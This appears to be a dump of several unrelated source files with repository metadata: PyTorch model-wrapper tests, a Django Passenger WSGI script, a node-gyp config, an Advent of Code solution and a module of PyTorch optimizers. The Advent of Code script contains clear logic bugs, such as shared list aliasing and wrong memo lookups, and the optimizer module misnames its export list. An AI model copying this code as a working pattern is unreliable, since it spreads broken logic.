    num_data = 5
    criterion = Mock()
    optimizer = Mock()
    model = Mock()
    criterion.return_value = np.float64(0.0)
    mock_get_params.return_value = [np.random.rand(num_data, 1, 24, 24), np.random.rand(10)]
    mock_evaluate.return_value = [0, 1, 2, 3, 4]
    batch = 32
    epoch = 1
    metrics = None
    device = 'cpu'
    kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
    data = np.array([np.random.rand(24, 24) for i in range(num_data)])
    data = np.reshape(data, (data.shape[0], 1, data.shape[1], data.shape[2]))
    labels = np.array([np.zeros(10) for i in range(num_data)])
    for l in labels:
        l[np.random.randint(0, len(l))] = 1
    res = kdpm.performance(data, labels)
    mock_evaluate.assert_called_once_with(data, labels)
    assert res == mock_evaluate.return_value[0]
def test_get_model_params():
    """get_model_params() returns each layer's weights as numpy arrays."""
    criterion = Mock()
    optimizer = Mock()
    model = Mock()
    params = [np.random.rand(5, 1, 2) for i in range(5)]
    params.append(np.random.rand(10))
    # Wrap every weight in a mock mimicking tensor.cpu().data.numpy().
    weights = []
    for elem in params:
        m = Mock()
        m.cpu().data.numpy.return_value = elem
        weights.append(m)
    model.parameters.return_value = weights
    batch = 32
    epoch = 1
    metrics = None
    device = 'cpu'
    kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
    parm = kdpm.get_model_params()
    # two calls in constructor and one call in get_model_params method
    kdpm._model.parameters.assert_has_calls([call() for i in range(3)])
    for one, two in zip(params, parm):
        assert np.array_equal(one, two)
@patch('shfl.model.deep_learning_model_pt.torch')
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
def test_set_weights(mock_get_params, mock_torch):
    """set_model_params() copies the given values into each parameter's .data."""
    num_data = 5
    criterion = Mock()
    optimizer = Mock()
    criterion.return_value = np.float64(0.0)
    model = Mock()
    model_params = [9, 5, 4, 8, 5, 6]
    m_model_params = []
    for elem in model_params:
        aux = Mock()
        aux.data = elem
        m_model_params.append(aux)
    model.parameters.return_value = m_model_params
    mock_get_params.return_value = [np.random.rand(num_data, 1, 24, 24), np.random.rand(10)]
    mock_torch.from_numpy.side_effect = side_effect_from_numpy
    batch = 32
    epoch = 1
    metrics = None
    device = 'cpu'
    kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
    set_params = [0, 1, 2, 3, 4, 5]
    kdpm.set_model_params(set_params)
    new_model_params = [x.data for x in kdpm._model.parameters()]
    assert np.array_equal(new_model_params, set_params)
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
def test_wrong_data(mock_get_params):
    """_check_data() rejects input whose shape does not match the model."""
    num_data = 5
    criterion = Mock()
    optimizer = Mock()
    model = Mock()
    criterion.return_value = np.float64(0.0)
    mock_get_params.return_value = [np.random.rand(num_data, 1, 24, 24), np.random.rand(10)]
    batch = 32
    epoch = 1
    metrics = None
    device = 'cpu'
    kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
    num_data = 5
    # 3-D data (missing channel axis) must fail the shape assertion.
    data = np.array([np.random.rand(24, 24) for i in range(num_data)])
    with pytest.raises(AssertionError):
        kdpm._check_data(data)
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
def test_wrong_labels(mock_get_params):
    """_check_labels() rejects labels whose width differs from the model output."""
    num_data = 5
    criterion = Mock()
    optimizer = Mock()
    model = Mock()
    criterion.return_value = np.float64(0.0)
    mock_get_params.return_value = [np.random.rand(num_data, 1, 24, 24), np.random.rand(10)]
    batch = 32
    epoch = 1
    metrics = None
    device = 'cpu'
    kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
    num_data = 5
    # 9-wide one-hot labels against a 10-way output must fail the assertion.
    labels = np.array([np.zeros(9) for i in range(num_data)])
    for l in labels:
        l[np.random.randint(0, len(l))] = 1
    with pytest.raises(AssertionError):
        kdpm._check_labels(labels)
| [
"gegonzalezse@gmail.com"
] | gegonzalezse@gmail.com |
aada7d908cda3af1717d57d4fd470e027d121983 | e57a58a9169d579e2436f1229d876413d7497bc2 | /passenger_wsgi.py | ac281d03cfc5cd47490047e6d9e0b57f87aff464 | [] | no_license | leety/alpha | dc56c12677a183e2a76f83493f12fc97bb95916f | c3efe1d67081522e018e9181a07ea3823a82fc67 | refs/heads/master | 2021-01-13T11:52:01.249529 | 2017-02-14T10:34:06 | 2017-02-14T10:34:06 | 81,694,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | import sys, os
# Passenger WSGI entry point: put the app on sys.path, re-exec under the
# virtualenv interpreter, then hand Django's WSGI application to Passenger.
cwd = os.getcwd()
sys.path.append(cwd)

# Re-exec this process under the virtualenv interpreter if not already there.
INTERP = os.path.expanduser("~/_venv/ssrd_v35/bin/python3")
if sys.executable != INTERP: os.execl(INTERP, INTERP, *sys.argv)

# BUG FIX: the original inserted literal '$HOME/...' strings, which Python
# never expands, so those sys.path entries could not resolve.  Expand the
# home directory the same way INTERP already does.
_VENV = os.path.expanduser("~/_venv/ssrd_v35")
sys.path.insert(0, _VENV + "/bin")
sys.path.insert(0, _VENV + "/lib/python3.5/site-packages/django")
sys.path.insert(0, _VENV + "/lib/python3.5/site-packages")

os.environ['DJANGO_SETTINGS_MODULE'] = '_cms.settings'

from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
| [
"hello.tien@gmail.com"
] | hello.tien@gmail.com |
b37a7112a1c54f36f2c252afd4b26a436e42e6f5 | ac04d359b6d901a84d3cd9d77f3ddb2f06b3269b | /node_modules/socket.io/node_modules/socket.io-client/node_modules/engine.io-client/node_modules/ws/build/config.gypi | b00092afb1d480fa3a7bed1959b4a9c7cbf39ca2 | [
"MIT"
] | permissive | martinsrs/node-socket-cron | aaa774241087fb20168eb67f77cbe66311cbb930 | c9d462b01d35ac86ddcd038c28d534a7f318afb2 | refs/heads/master | 2020-04-04T14:48:47.487034 | 2015-04-16T12:49:04 | 2015-04-16T12:49:04 | 31,238,588 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,066 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 1,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "/usr/local/Cellar/node/0.10.26",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"python": "/usr/bin/python",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "true",
"nodedir": "/Users/eduardomartins/.node-gyp/0.10.26",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"shell": "/bin/zsh",
"parseable": "",
"shrinkwrap": "true",
"email": "",
"init_license": "ISC",
"cache_max": "null",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"registry": "https://registry.npmjs.org/",
"fetch_retries": "2",
"npat": "",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"cache_lock_retries": "10",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"json": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/eduardomartins/.npm-init.js",
"userconfig": "/Users/eduardomartins/.npmrc",
"node_version": "v0.10.26",
"user": "",
"save": "true",
"editor": "vi",
"tag": "latest",
"global": "",
"optional": "true",
"username": "",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "null",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"strict_ssl": "true",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/Users/eduardomartins/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"ignore_scripts": "",
"user_agent": "node/v0.10.26 darwin x64",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"umask": "18",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/var/folders/rc/6k3t_6tj3175tg8q28p8prhr0000gn/T/",
"unsafe_perm": "true",
"prefix": "/usr/local",
"link": ""
}
}
| [
"martins.rs@gmail.com"
] | martins.rs@gmail.com |
b517da0b0b1bd999245dbe80669a71eb33fdb5b5 | 2c5789827efad96457cb9ae43724db30f2652fb5 | /19/2.py | 0b150f76a7de9d0cb5d802916f060c20b03e80b1 | [] | no_license | harvito/aoc2020 | f6167d7e1cb7a829837a3071d45cdea56b2e1eb5 | 5786886ba431450c36b02fc74bf94f6ad7c81737 | refs/heads/master | 2023-02-09T09:29:02.106065 | 2021-01-02T21:07:43 | 2021-01-02T21:07:43 | 326,283,346 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,346 | py | with open("input.txt") as f:
blocks = f.read().split("\n\n")
rulesLines = blocks[0].splitlines()
inputLines = blocks[1].splitlines()
numRules = len(rulesLines)
rulesList = [[]] * numRules
referencedBy = [set()] * numRules
memo = [[]] * numRules
activeQueue = []
for line in rulesLines:
parts = line.split(": ")
index = int(parts[0])
ors = parts[1].split(" | ")
seqs = []
for seq in ors:
seqList = seq.split()
if seqList[0][0] == '"':
literal = [seqList[0][1]]
memo[index] = literal
# print "appending", literal
seqs.append(literal)
memo[index] = literal
activeQueue.append(index)
else:
# print "appending", seqList
seqIntList = [ int(x) for x in seqList ]
seqs.append(seqList)
for i in seqIntList:
referencedBy[i].add(index)
rulesList[index] = seqs
# 8: 42 | 42 8
# 11: 42 31 | 42 11 31
rulesList[8] = [["42"], ["42", "8"]]
rulesList[11] = [["42", "31"], ["42", "11", "31"]]
longestTest = max(len(ele) for ele in inputLines)
print rulesList
print "base rules:", memo
print "longest test length:", longestTest
rule8count = 0
rule11count = 0
completedSet = set(activeQueue)
i = 0
while len(completedSet) < numRules:
ruleNo = activeQueue[i]
rule = rulesList[ruleNo]
# skip if we don't have enough info memoized
for seq in rule:
for r in seq:
if not memo[r]:
continue
if ruleNo == 8:
if rule8count > 10:
completedSet.add(ruleNo)
else:
rule8count += 1
elif ruleNo == 11:
if rule11count > 10:
completedSet.add(ruleNo)
else:
rule11count += 1
else:
completedSet.add(ruleNo)
# find who references this rule
for r in referencedBy[ruleNo]:
if (r not in completedSet) or (r in [8, 11]):
activeQueue.append(r)
matchesList = [] # should be a list of strings
for seq in rule:
matching = [""] # another list of matching strings, starting with the empty string
for rule in seq: # ex 12 71 9
if not memo[ruleNo]:
print "UH OH RULE NOT MEMOIZED:", rule
newMatching = []
for match in memo[ruleNo]:
for oldMatch in matching:
newMatching.append(oldMatch + match)
matchesList += matching # join the rules into 1 string
memo[ruleNo] = matchesList
i += 1
print "OK" | [
"michael.harvey@mail.mcgill.ca"
] | michael.harvey@mail.mcgill.ca |
fc36d84f94ba46943d0a7f3c5006f6ab24c005d4 | 35013eaf58d72593abcde2db0b36d44ccc1ddec4 | /ticketter/ticket/views.py | ce70f5d01c7924d73a073da782bec321c69a4e60 | [] | no_license | Nishant173/support-ticket-assignment | e81b154aaa575e86acc054682b84e7737ab9da56 | 31e389103bdcd1c05edd8db8911e05285f10e3f1 | refs/heads/main | 2023-01-28T21:05:11.788696 | 2020-12-09T11:26:42 | 2020-12-09T11:26:42 | 319,643,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,852 | py | from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.shortcuts import redirect, render
from .forms import TicketCreationForm
from .models import Ticket
from . import utils
from api import (crud_ops as api_crud_ops,
errors as api_errors,
filters as api_filters)
# @login_required
# def create_ticket(request):
# if request.method == 'POST':
# form = TicketCreationForm(data=request.POST)
# if form.is_valid():
# form.save()
# messages.success(request=request, message="Ticket has been created")
# return redirect(to='account-home')
# else:
# form = TicketCreationForm(initial={'username': request.user.username})
# return render(request=request, template_name='ticket/create_ticket.html', context={'form': form})
# @login_required
# def view_tickets(request):
# tickets = Ticket.objects.filter(username__exact=request.user.username)
# is_empty = (len(tickets) == 0)
# context = {
# 'tickets': tickets,
# 'is_empty': is_empty,
# }
# return render(request=request, template_name='ticket/view_tickets.html', context=context)
@login_required
def create_ticket(request):
    """Create a support ticket for the logged-in user via the backend API.

    GET renders an empty ``TicketCreationForm`` pre-filled with the username.
    POST validates the form, maps the cleaned data to the API payload and
    forwards it to ``api_crud_ops.post_ticket``; on success the user is
    redirected to the account home page, otherwise a warning banner is shown
    and the bound form is re-rendered.
    """
    if request.method == 'POST':
        form = TicketCreationForm(data=request.POST)
        if form.is_valid():
            dict_obj = form.cleaned_data
            # Translate the Django form fields into the API's expected schema,
            # attaching the requesting user's email.
            dict_obj = utils.map_model2api(dict_obj=dict_obj, email=request.user.email)
            response = api_crud_ops.post_ticket(dict_obj=dict_obj)
            if response.get('status_code', '') in [200, 201]:
                messages.success(request=request, message="Ticket has been created")
                return redirect(to='account-home')
            else:
                # API failure: fall through and re-render the bound form with
                # a warning that includes the returned status code.
                status_code = response.get('status_code', 'Backend')
                messages.warning(request=request,
                                 message=f"{status_code} error. Please try again later")
    else:
        form = TicketCreationForm(initial={'username': request.user.username})
    return render(request=request, template_name='ticket/create_ticket.html', context={'form': form})
@login_required
def view_tickets(request):
    """List the logged-in user's tickets fetched from the backend API.

    Tickets are retrieved via ``api_crud_ops.get_tickets`` and filtered down
    to the current user's email.  If the API call raises
    ``BadApiRequestError``, an empty list is rendered with ``is_error`` set so
    the template can show an error state instead.
    """
    username = request.user.username
    try:
        tickets = api_crud_ops.get_tickets()
    except api_errors.BadApiRequestError:
        context = {'tickets': [], 'is_empty': True, 'is_error': True, 'username': username}
    else:
        # Success path: keep only this user's tickets.
        tickets = api_filters.filter_tickets(tickets=tickets, email=request.user.email)
        is_empty = (len(tickets) == 0)
        context = {
            'tickets': tickets,
            'is_empty': is_empty,
            'is_error': False,
            'username': username,
        }
    return render(request=request, template_name='ticket/view_tickets.html', context=context)
"nishant.rao173@gmail.com"
] | nishant.rao173@gmail.com |
fac8ec60cc6c93ba0484b469e3c1814f07f23104 | 3b28143a893fcd6d2d0ed843db74eaf5f63fe542 | /pydatagrand/callback/optimizater.py | 603284a6359f1eea4369c77f94000b37cf2c16a2 | [] | no_license | gaozhanfire/daguan_2019_rank9 | 1e2f506c11067cf66ff0fe3a2460773f71955ef6 | 2b77a50455d33a8d484180fa548025b5ef72dfb6 | refs/heads/master | 2020-08-06T17:42:54.445208 | 2019-09-30T12:01:41 | 2019-09-30T12:01:41 | 213,096,559 | 1 | 0 | null | 2019-10-06T02:03:12 | 2019-10-06T02:03:11 | null | UTF-8 | Python | false | false | 66,068 | py | import math
import torch
import operator
from copy import copy
import functools
from math import sqrt
from torch.optim.optimizer import Optimizer
import itertools as it
from torch.nn.utils import clip_grad_norm_
from .utils import *
# NOTE(review): this export list is bound to ``__call__``, which has no
# special meaning at module level -- ``__all__`` was almost certainly
# intended (it is what ``from module import *`` consults).  Before renaming,
# confirm every listed name is actually defined in this module.
__call__ = ['SGDW',
            'AdamW',
            'AdaBound',
            'Nadam',
            'AdaFactor',
            'WeightDecayOptimizerWrapper',
            'NovoGrad',
            'Lamb',
            'Lars',
            'RAdam',
            'Ralamb',
            'Lookahead',
            'RaLars',
            'Ranger',
            'BertAdam'
            ]
class SGDW(Optimizer):
    r"""Implements SGD (optionally with momentum) with decoupled weight decay.

    The weight decay is applied directly to the weights instead of being
    folded into the gradient, following the paper
    `Fixing Weight Decay Regularization in Adam`_.
    Nesterov momentum is based on the formula from
    `On the importance of initialization and momentum in deep learning`__.

    Args:
        params (iterable): iterable of parameters to optimize or dicts defining
            parameter groups
        lr (float): learning rate (default: 0.1)
        momentum (float, optional): momentum factor (default: 0)
        dampening (float, optional): dampening for momentum (default: 0)
        weight_decay (float, optional): decoupled weight decay factor (default: 0)
        nesterov (bool, optional): enables Nesterov momentum (default: False)

    .. _Fixing Weight Decay Regularization in Adam:
        https://arxiv.org/abs/1711.05101

    Example:
        >>> model = LSTM()
        >>> optimizer = SGDW(model.parameters(), lr=0.1, momentum=0.9,weight_decay=1e-5)
    """

    def __init__(self, params, lr=0.1, momentum=0, dampening=0,
                 weight_decay=0, nesterov=False):
        if lr < 0.0:
            raise ValueError(f"Invalid learning rate: {lr}")
        if momentum < 0.0:
            raise ValueError(f"Invalid momentum value: {momentum}")
        if weight_decay < 0.0:
            raise ValueError(f"Invalid weight_decay value: {weight_decay}")
        defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
                        weight_decay=weight_decay, nesterov=nesterov)
        if nesterov and (momentum <= 0 or dampening != 0):
            raise ValueError("Nesterov momentum requires a momentum and zero dampening")
        super(SGDW, self).__init__(params, defaults)

    def __setstate__(self, state):
        super(SGDW, self).__setstate__(state)
        # Older checkpoints may predate the 'nesterov' option.
        for group in self.param_groups:
            group.setdefault('nesterov', False)

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.

        Returns:
            The loss returned by ``closure`` if one was given, else ``None``.
        """
        loss = None
        if closure is not None:
            loss = closure()

        for group in self.param_groups:
            weight_decay = group['weight_decay']
            momentum = group['momentum']
            dampening = group['dampening']
            nesterov = group['nesterov']
            for p in group['params']:
                if p.grad is None:
                    continue
                d_p = p.grad.data
                if momentum != 0:
                    param_state = self.state[p]
                    if 'momentum_buffer' not in param_state:
                        # First step: the buffer is simply a copy of the
                        # gradient (0 * momentum + d_p == d_p).
                        buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
                    else:
                        buf = param_state['momentum_buffer']
                        # Keyword `alpha` replaces the deprecated
                        # Tensor.add_(Number, Tensor) overload.
                        buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
                    if nesterov:
                        d_p = d_p.add(buf, alpha=momentum)
                    else:
                        d_p = buf
                # Decoupled weight decay: shrink the weights directly rather
                # than adding wd * p to the gradient.
                if weight_decay != 0:
                    p.data.add_(p.data, alpha=-weight_decay)
                p.data.add_(d_p, alpha=-group['lr'])
        return loss
class AdamW(Optimizer):
    """Implements Adam with decoupled weight decay (AdamW).

    Arguments:
        params (iterable): iterable of parameters to optimize or dicts defining
            parameter groups
        lr (float, optional): learning rate (default: 1e-3)
        betas (Tuple[float, float], optional): coefficients used for computing
            running averages of gradient and its square (default: (0.9, 0.999))
        eps (float, optional): term added to the denominator to improve
            numerical stability (default: 1e-8)
        weight_decay (float, optional): decoupled weight decay factor (default: 0)
        amsgrad (boolean, optional): whether to use the AMSGrad variant of this
            algorithm from the paper `On the Convergence of Adam and Beyond`_

    Example:
        >>> model = LSTM()
        >>> optimizer = AdamW(model.parameters(), lr=1e-3, weight_decay=1e-5)
    """

    def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
                 weight_decay=0, amsgrad=False):
        if lr < 0.0:
            raise ValueError("Invalid learning rate: {}".format(lr))
        if not 0.0 <= eps:
            raise ValueError("Invalid epsilon value: {}".format(eps))
        if not 0.0 <= betas[0] < 1.0:
            raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
        if not 0.0 <= betas[1] < 1.0:
            raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
        defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay, amsgrad=amsgrad)
        super().__init__(params, defaults)

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.

        Returns:
            The loss returned by ``closure`` if one was given, else ``None``.
        """
        loss = None
        if closure is not None:
            loss = closure()

        for group in self.param_groups:
            for p in group['params']:
                if p.grad is None:
                    continue
                grad = p.grad.data
                if grad.is_sparse:
                    raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
                amsgrad = group['amsgrad']

                state = self.state[p]

                # State initialization
                if len(state) == 0:
                    state['step'] = 0
                    # Exponential moving average of gradient values
                    state['exp_avg'] = torch.zeros_like(p.data)
                    # Exponential moving average of squared gradient values
                    state['exp_avg_sq'] = torch.zeros_like(p.data)
                    if amsgrad:
                        # Maintains max of all exp. moving avg. of sq. grad. values
                        state['max_exp_avg_sq'] = torch.zeros_like(p.data)

                exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
                if amsgrad:
                    max_exp_avg_sq = state['max_exp_avg_sq']
                beta1, beta2 = group['betas']

                state['step'] += 1

                # First/second moment updates; keyword alpha/value forms
                # replace the deprecated positional-alpha overloads.
                exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1)
                exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
                if amsgrad:
                    # Maintains the maximum of all 2nd moment running avg. till now
                    torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
                    # Use the max. for normalizing running avg. of gradient
                    denom = max_exp_avg_sq.sqrt().add_(group['eps'])
                else:
                    denom = exp_avg_sq.sqrt().add_(group['eps'])

                bias_correction1 = 1 - beta1 ** state['step']
                bias_correction2 = 1 - beta2 ** state['step']
                step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1

                if group['weight_decay'] != 0:
                    # Decoupled decay: computed from the pre-update weights and
                    # subtracted after the Adam update.
                    decayed_weights = torch.mul(p.data, group['weight_decay'])
                    p.data.addcdiv_(exp_avg, denom, value=-step_size)
                    p.data.sub_(decayed_weights)
                else:
                    p.data.addcdiv_(exp_avg, denom, value=-step_size)

        return loss
class AdaBound(Optimizer):
    """Implements AdaBound algorithm.

    It has been proposed in `Adaptive Gradient Methods with Dynamic Bound of Learning Rate`_.

    Arguments:
        params (iterable): iterable of parameters to optimize or dicts defining
            parameter groups
        lr (float, optional): Adam learning rate (default: 1e-3)
        betas (Tuple[float, float], optional): coefficients used for computing
            running averages of gradient and its square (default: (0.9, 0.999))
        final_lr (float, optional): final (SGD) learning rate (default: 0.1)
        gamma (float, optional): convergence speed of the bound functions (default: 1e-3)
        eps (float, optional): term added to the denominator to improve
            numerical stability (default: 1e-8)
        weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
        amsbound (boolean, optional): whether to use the AMSBound variant of this algorithm

    .. Adaptive Gradient Methods with Dynamic Bound of Learning Rate:
        https://openreview.net/forum?id=Bkg3g2R9FX

    Example:
        >>> model = LSTM()
        >>> optimizer = AdaBound(model.parameters())
    """

    def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), final_lr=0.1, gamma=1e-3,
                 eps=1e-8, weight_decay=0, amsbound=False):
        if not 0.0 <= lr:
            raise ValueError("Invalid learning rate: {}".format(lr))
        if not 0.0 <= eps:
            raise ValueError("Invalid epsilon value: {}".format(eps))
        if not 0.0 <= betas[0] < 1.0:
            raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
        if not 0.0 <= betas[1] < 1.0:
            raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
        if not 0.0 <= final_lr:
            raise ValueError("Invalid final learning rate: {}".format(final_lr))
        if not 0.0 <= gamma < 1.0:
            raise ValueError("Invalid gamma parameter: {}".format(gamma))
        defaults = dict(lr=lr, betas=betas, final_lr=final_lr, gamma=gamma, eps=eps,
                        weight_decay=weight_decay, amsbound=amsbound)
        super(AdaBound, self).__init__(params, defaults)

        # Remember the initial lr per group so lr-scheduler decay can be
        # transferred onto final_lr in step().
        self.base_lrs = list(map(lambda group: group['lr'], self.param_groups))

    def __setstate__(self, state):
        super(AdaBound, self).__setstate__(state)
        for group in self.param_groups:
            group.setdefault('amsbound', False)

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.

        Returns:
            The loss returned by ``closure`` if one was given, else ``None``.
        """
        loss = None
        if closure is not None:
            loss = closure()

        for group, base_lr in zip(self.param_groups, self.base_lrs):
            for p in group['params']:
                if p.grad is None:
                    continue
                grad = p.grad.data
                if grad.is_sparse:
                    raise RuntimeError(
                        'Adam does not support sparse gradients, please consider SparseAdam instead')
                amsbound = group['amsbound']

                state = self.state[p]

                # State initialization
                if len(state) == 0:
                    state['step'] = 0
                    # Exponential moving average of gradient values
                    state['exp_avg'] = torch.zeros_like(p.data)
                    # Exponential moving average of squared gradient values
                    state['exp_avg_sq'] = torch.zeros_like(p.data)
                    if amsbound:
                        # Maintains max of all exp. moving avg. of sq. grad. values
                        state['max_exp_avg_sq'] = torch.zeros_like(p.data)

                exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
                if amsbound:
                    max_exp_avg_sq = state['max_exp_avg_sq']
                beta1, beta2 = group['betas']

                state['step'] += 1

                # Classic (coupled) L2 penalty folded into the gradient.
                if group['weight_decay'] != 0:
                    grad = grad.add(p.data, alpha=group['weight_decay'])

                # Moment updates; keyword alpha/value forms replace the
                # deprecated positional-alpha overloads.
                exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1)
                exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
                if amsbound:
                    # Maintains the maximum of all 2nd moment running avg. till now
                    torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
                    # Use the max. for normalizing running avg. of gradient
                    denom = max_exp_avg_sq.sqrt().add_(group['eps'])
                else:
                    denom = exp_avg_sq.sqrt().add_(group['eps'])

                bias_correction1 = 1 - beta1 ** state['step']
                bias_correction2 = 1 - beta2 ** state['step']
                step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1

                # Applies bounds on actual learning rate.
                # lr_scheduler cannot affect final_lr, this is a workaround
                # to apply lr decay to the bound target as well.
                final_lr = group['final_lr'] * group['lr'] / base_lr
                lower_bound = final_lr * (1 - 1 / (group['gamma'] * state['step'] + 1))
                upper_bound = final_lr * (1 + 1 / (group['gamma'] * state['step']))
                step_size = torch.full_like(denom, step_size)
                step_size.div_(denom).clamp_(lower_bound, upper_bound).mul_(exp_avg)

                p.data.add_(-step_size)

        return loss
class Nadam(Optimizer):
    """Implements Nadam algorithm (a variant of Adam based on Nesterov momentum).

    It has been proposed in `Incorporating Nesterov Momentum into Adam`__.

    Arguments:
        params (iterable): iterable of parameters to optimize or dicts defining
            parameter groups
        lr (float, optional): learning rate (default: 2e-3)
        betas (Tuple[float, float], optional): coefficients used for computing
            running averages of gradient and its square
        eps (float, optional): term added to the denominator to improve
            numerical stability (default: 1e-8)
        weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
        schedule_decay (float, optional): momentum schedule decay (default: 4e-3)

    __ http://cs229.stanford.edu/proj2015/054_report.pdf
    __ http://www.cs.toronto.edu/~fritz/absps/momentum.pdf

    Originally taken from: https://github.com/pytorch/pytorch/pull/1408
    NOTE: Has potential issues but does work well on some problems.
    """

    def __init__(self, params, lr=2e-3, betas=(0.9, 0.999), eps=1e-8,
                 weight_decay=0, schedule_decay=4e-3):
        defaults = dict(lr=lr, betas=betas, eps=eps,
                        weight_decay=weight_decay, schedule_decay=schedule_decay)
        super(Nadam, self).__init__(params, defaults)

    def step(self, closure=None):
        """Performs a single optimization step.

        Arguments:
            closure (callable, optional): A closure that reevaluates the model
                and returns the loss.

        Returns:
            The loss returned by ``closure`` if one was given, else ``None``.
        """
        loss = None
        if closure is not None:
            loss = closure()

        for group in self.param_groups:
            for p in group['params']:
                if p.grad is None:
                    continue
                grad = p.grad.data
                state = self.state[p]

                # State initialization.  torch.zeros_like replaces the
                # deprecated new().resize_as_().zero_() chain.
                if len(state) == 0:
                    state['step'] = 0
                    state['m_schedule'] = 1.
                    state['exp_avg'] = torch.zeros_like(grad)
                    state['exp_avg_sq'] = torch.zeros_like(grad)

                # Warming momentum schedule
                m_schedule = state['m_schedule']
                schedule_decay = group['schedule_decay']
                exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
                beta1, beta2 = group['betas']
                eps = group['eps']

                state['step'] += 1
                t = state['step']

                # Classic (coupled) L2 penalty folded into the gradient.
                if group['weight_decay'] != 0:
                    grad = grad.add(p.data, alpha=group['weight_decay'])

                # mu_t and mu_{t+1} of the Nesterov momentum schedule.
                momentum_cache_t = beta1 * \
                    (1. - 0.5 * (0.96 ** (t * schedule_decay)))
                momentum_cache_t_1 = beta1 * \
                    (1. - 0.5 * (0.96 ** ((t + 1) * schedule_decay)))
                m_schedule_new = m_schedule * momentum_cache_t
                m_schedule_next = m_schedule * momentum_cache_t * momentum_cache_t_1
                state['m_schedule'] = m_schedule_new

                # Decay the first and second moment running average coefficient
                # (keyword alpha/value replace the deprecated positional forms).
                exp_avg.mul_(beta1).add_(grad, alpha=1. - beta1)
                exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1. - beta2)
                exp_avg_sq_prime = exp_avg_sq / (1. - beta2 ** t)
                denom = exp_avg_sq_prime.sqrt_().add_(eps)

                # Nesterov update: one term from the raw gradient, one from
                # the (look-ahead) momentum average.
                p.data.addcdiv_(grad, denom,
                                value=-group['lr'] * (1. - momentum_cache_t) / (1. - m_schedule_new))
                p.data.addcdiv_(exp_avg, denom,
                                value=-group['lr'] * momentum_cache_t_1 / (1. - m_schedule_next))

        return loss
class AdaFactor(Optimizer):
    '''Memory-efficient AdaFactor optimizer.

    # Code below is an implementation of https://arxiv.org/pdf/1804.04235.pdf
